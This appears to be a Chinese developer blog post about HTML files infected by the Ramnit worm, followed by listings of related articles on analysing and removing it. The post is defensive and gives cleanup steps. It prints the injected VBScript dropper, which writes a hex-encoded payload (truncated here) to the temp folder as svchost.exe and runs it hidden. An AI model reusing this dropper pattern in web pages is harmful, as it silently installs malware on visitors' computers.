ramnit病毒

最新推荐文章于 2026-05-06 08:17:16 发布
原创 最新推荐文章于 2026-05-06 08:17:16 发布 · 9.6k 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
标签
#病毒
在使用Hbuilder时,发现HTML文件被植入ramnit病毒,表现为含有VBScript的恶意代码。该病毒为感染型,需断开网络防止反复感染,并采取一系列措施进行清理和查杀。包括:漏洞修复、系统防黑加固、设置强口令以及使用最新版360杀毒软件全盘扫描。

今天打开Hbuilder,发现每个html文档都有如下代码:


<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =4B3F9................................................................0FAB3F-------无数个十六进制字符

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

//--></SCRIPT>


网上搜索是电脑中的ramnit病毒


此类病毒是感染类病毒,要先断源,防止反复感染,然后清理查杀才有效

1.使用漏洞修复扫描,并安装所有的高危漏洞补丁

2.使用安全卫士--功能大全---系统防黑加固扫描,解决系统薄弱项,防止因为弱口令问题导致反复感染

3.如果有安装oracle,my SQL之类的数据库软件,请将登录口令设置在16位以上,要包含大小写,数字和特殊字符,理由同上

4.下载安装最新版的360杀毒,并在断网情况下进行下全盘扫描扫描完毕后重启,然后再次全盘扫描,即可解决问题


Ramnit感染型病毒分析与处置
不忘初心,护天下安全!
08-03 6025
详细分析Ramnit感染性病毒
[样本分析] Ramnit感染型病毒
qq_42814021的博客
01-14 5682
文章目录样本信息样本行为详细分析样本行为 样本信息 MD5:ff5e1f27193ce51eec318714ef038bef 类型:exe32 分析工具:DIE、火绒剑、OD、x32dbg、IDA 样本行为 详细分析 拿到样本之后,先拖到DIE中看一下,发现有UPX壳。 直接脱壳: 脱壳成功后,用IDA打开,发现入口处是无意义的函数调用: 阅读其他分析文章发现是需要先解密然后再脱一次壳,暂时搞不太懂。 直接根据参考的分析文章上的EP脱壳,竟然成功了。之后有时间再看解密,先继续分析。 样本行为 入口处主
解决 Virus:Win32/Ramnit 蠕虫病毒的方法
牧魂的博客
01-30 6257
解决 Virus:Win32/Ramnit 蠕虫病毒的方法
别再为远程抄表发愁了!手把手教你用4G DTU+Modbus搞定温湿度数据上云
最新发布
weixin_30689307的博客
05-06 497
本文详细介绍了如何利用4G DTU和Modbus协议搭建温湿度监测系统,实现工业物联网环境下的远程数据采集与上云。通过硬件选型、通信协议解析、云端服务部署及现场调试指南,帮助用户快速构建稳定可靠的无线监测方案,解决传统人工抄表效率低下的问题。
Ramnit蠕虫
swordheart的博客
01-23 7715
Ramnit蠕虫 1、病毒简介 Ramnit 是一个典型的VBScript蠕虫病毒,能够通过网页挂马的方式进行传播,用户在浏览器中浏览挂载该恶意代码的HTML页面后并点击加载ActiveX控件后主机就有可能受到恶意代码的感染 2、病毒危害 Ramnit病毒可以监控网络访问活动等,可能导致网上银行交易等信息的泄露或盗取;该病毒还可以扫描和浏览服务器中的文件系统,获取敏感的文件信息;此外该病毒通过控制某台计算机可以作为攻击者的跳板对整个内部网络造成危害。 3、终端验证 1、文件 在被植入了
感染ramnit家族蠕虫的处置建议和方法
qq_51068285的博客
02-27 4415
ranmit家族蠕虫
Ramnit病毒分析
好好学习,天天向上
06-25 4405
Ramnit病毒是一个相对古老的病毒,使用会感染系统内的exe和html文件,通过文件分发和U盘传播。
Ramnit病毒简介
si1ence安全博客
01-11 1万+
0x0 背景 1、Ramnit 病毒的网页传播方式 在被植入了 Ramnit 病毒的主机中,病毒会感染主机中的 .html 或 .htm 后缀的网页,在 .html 或 .htm 文件中添加如下的 vbs 攻击代码: 当使用低版本或安全策略配置不当的 IE 浏览器访问被 Ramnit 感染的 html 网页时,感染 html 网页的 vbs 攻击代码将被执行,创建并运行 Ramnit 病毒。继而 Ramnit 病毒会感染访问者本地计算机的 html 文件,从而形成蠕虫的自动...
Ramnit病毒移除工具包实用指南
weixin_30923011的博客
05-23 928
Ramnit是一种复杂的多态病毒,它首次被发现于2010年,并迅速成为网络安全领域的主要威胁之一。该病毒主要针对Windows操作系统,通过感染可执行文件、窃取敏感数据和利用被感染的计算机进行网络攻击。"RamnitRemove"作为一款针对Ramnit病毒设计的专用工具包,旨在帮助用户彻底清理受感染的系统并恢复正常操作。为了更深入地理解这款工具包,本章将对"RamnitRemove"的组件及其功能进行详细分析。
Ramnit病毒专杀工具完整解决方案
weixin_42584507的博客
09-09 1585
Ramnit是一种高度复杂的多态性恶意软件,融合了蠕虫、木马和窃密程序的特性,自2010年首次被发现以来,便成为网络安全领域的重要威胁。该病毒具备感染Windows系统下.exe可执行文件与.lnk快捷方式文件的能力,通过可移动存储设备、网络共享以及系统漏洞进行传播。其不仅能够实现自我复制和横向渗透,还具备远程控制、敏感信息窃取等恶意行为,严重危及用户隐私和系统安全。本章将从Ramnit的基本特征入手,逐步展开其历史演变、攻击目标及在网络安全中的危害性分析,为后续章节的深入探讨打下坚实基础。
HTML文件自动加入了VBS代码,html病毒:自动注入VBS代码-Ramnit病毒怎么解决!
weixin_33093323的博客
05-30 1931
新写的html文件,总是在保存之后,自动变成一个超大文件,如图源文件大约3k,保存之后200多k,打开一看是被注入了很多不明vbs代码:360安全中心和腾讯管家直接报毒,秒删文件,被这个玩意折腾的痛不欲生,杀毒之后重新电脑,一开机找了个.html文件试了一下,还是依然没有解决!!这个病毒还会主动感染,导致本地磁盘很多项目文件被感染,杀毒后小心翼翼上传到服务器依然中招阵亡!难道本地和服务器都要全部格...
蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法
weixin_42706667的博客
06-22 1361
参考:https://www.cnblogs.com/wuhairui/p/8297614.htmlhttp://www.guopingblog.com/post/100.html最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样DropFileName=“svchost.exe”WriteData=“4D5A000020000...
Ramnit感染型蠕虫病毒专杀工具
LLL_liuhui的博客
11-14 1万+
电脑突然中病毒了,所有html文件后面都加了一段VB的语句,花了半天时间终于解决了 问题如图:经常弹出这个弹框 解决办法: 运行FxRamnit杀毒软件,下载链接:http://dx2.pc0359.cn/soft/f/FxRamnit.rar 下载解压后点击运行点击start,运行完后重启电脑,就可以了 详情可以查看:https://jingyan.baidu.com/articl...
互联网做项目,一定要注意网络安全,不能中蠕虫ramnit.x病毒
热门推荐
青峰客
05-18 2万+
    今远程操作国外客户电脑的时候,发现其电脑中了病毒!蠕虫病毒,virus.win32.ramnit.x,软件刚开始还能使用,接着在用的时候就会失灵,仔细一看感染病毒了! virus.win32.ramnit.x病毒感染全盘EXE HTM HTML DLL文件,感染后的EXE运行后会在该EXE同目录下生成一个55kb或111kb大小的无图标病毒文件(55kb是第一次运行,第二次运行就变成...
解决virus:win32/ramnit.a病毒
庐陵居士
05-30 4988
现在导航到C:C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service。在这里,通过在键盘上按下 Shift + Del来删除DetectionHistory文件夹。转到顶部的"查看"选项卡并勾选"隐藏项"选项。按下win+E打开文件资源管理器。
Virus.Win32.Ramnit.X,Virus.Win32.Ramnit.a病毒
一抹离愁
07-09 2万+
近日电脑中了ramnit,a的病毒,原因是在网上下载了一个软件。没有杀毒,起初360无法检测 用360急救第一次杀完Virus.Win32.Ramnit.X,第二次再扫成Virus.Win32.Ramnit.a病毒, 使用毒霸软件扫,没想到,毒霸直接被感染,(推荐网友以后不要使用毒霸) 最后使用国外软件赛马铁克专杀。 病毒特征 每个html底部都会有一串代码 ...
FxRamnit.exe - 专为Win32 Ramnit病毒设计的专杀工具
weixin_32921023的博客
08-02 1438
Win32 Ramnit是一种混合型恶意软件,综合了病毒、木马和蠕虫的特征,它能够感染Windows操作系统,并且通过各种途径传播,对用户的数据安全和系统完整构成了严重威胁。自2010年首次发现以来,Ramnit通过网络共享、电子邮件和恶意链接等多种手段扩散,并能够窃取用户的个人信息和银行凭证。随着信息技术的飞速发展,恶意软件,尤其是像Win32 Ramnit这样的复杂病毒,不断地对我们的数字生活和企业运营构成威胁。恶意软件发展的趋势正逐步向着更高的隐蔽性、更广的传播范围以及更强的破坏力演变。
最近碰到了一个病毒木马:virus.win32.ramnit.B
weixin_30917213的博客
01-13 1万+
由于 使用了 简单游 平台上的挂机工具:番茄-自动人机对战免费版1217 ,使用了很久,头段时间家里电脑 360提示有病毒,本来我一直忽略的,但 我扫描了一下,大量的这个木马,于是 吧 简单游卸载了,全盘扫描,杀毒,修复了许多文件。许多文件被感染,文件大小都变了,还好 360 可以修复感染文件。 这一次,我是用公司电脑,再次 尝试使用 简单游 的挂机工具,没想到 依旧 是这个病毒 virus...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值